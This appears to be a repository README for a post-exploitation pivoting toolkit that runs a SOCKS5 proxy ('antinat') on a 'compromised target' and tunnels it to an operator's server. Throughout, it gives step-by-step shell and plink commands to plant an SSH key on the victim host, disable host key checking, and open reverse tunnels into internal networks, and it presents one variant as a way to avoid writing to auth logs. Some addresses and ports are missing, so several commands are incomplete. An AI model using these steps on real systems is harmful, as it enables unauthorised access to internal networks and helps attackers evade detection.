No Description

Giulio 219186456b Improved instructions 1 year ago
linux ec9b2001e2 packer for linux64 1 year ago
windows 219186456b Improved instructions 1 year ago 219186456b Improved instructions 1 year ago


Making pivoting into internal networks easier and faster so you can focus on the real fun :)


The idea is to execute a socks5 server on the compromised target and forward the local port remotely via SSH. A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's antinat coming to the rescue.



On our server

useradd -m -s /bin/nologin targetname
ssh-keygen -t ecdsa -f /tmp/sshkey  -q -N ""
mkdir /home/targetname/.ssh
cp /tmp/ /home/targetname/.ssh/authorized_keys
chown -R targetname:targetname /home/targetname/.ssh
chmod 600 /home/targetname/.ssh/authorized_keys
cat /tmp/sshkey

Copy the content of /tmp/sshkey

On the compromised host

echo "my copied sshkey" >> /tmp/.keyfile
chmod 600 /tmp/.keyfile
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22: -i /tmp/.keyfile -fNT targetname@myserver

Now on your server

ssh -D compromiseduser@ -p 2222 -fNT


We can combine the antinat proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.

Instead of using with the socks options, upload the provided package and directly forward the antinat port.

./antinat -cantinat.xml
ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L -i /tmp/.keyfile -fNT targetname@myserver


Upload the package and extract it.

Start the antinat binary, no admin permissions are required:

antinat.exe -a -cC:\temp\antinat.xml

Forward the antinat port with plink:

echo y | plink -ssh -noagent -pw "wrongpassword" targetname@myserver
plink -ssh -noagent -C -T -N -pw "password" -R targetname@myserver

Putty natively supports SSH via HTTP and so does plink but it can only work via cli if a preconfigured session already exist. More info.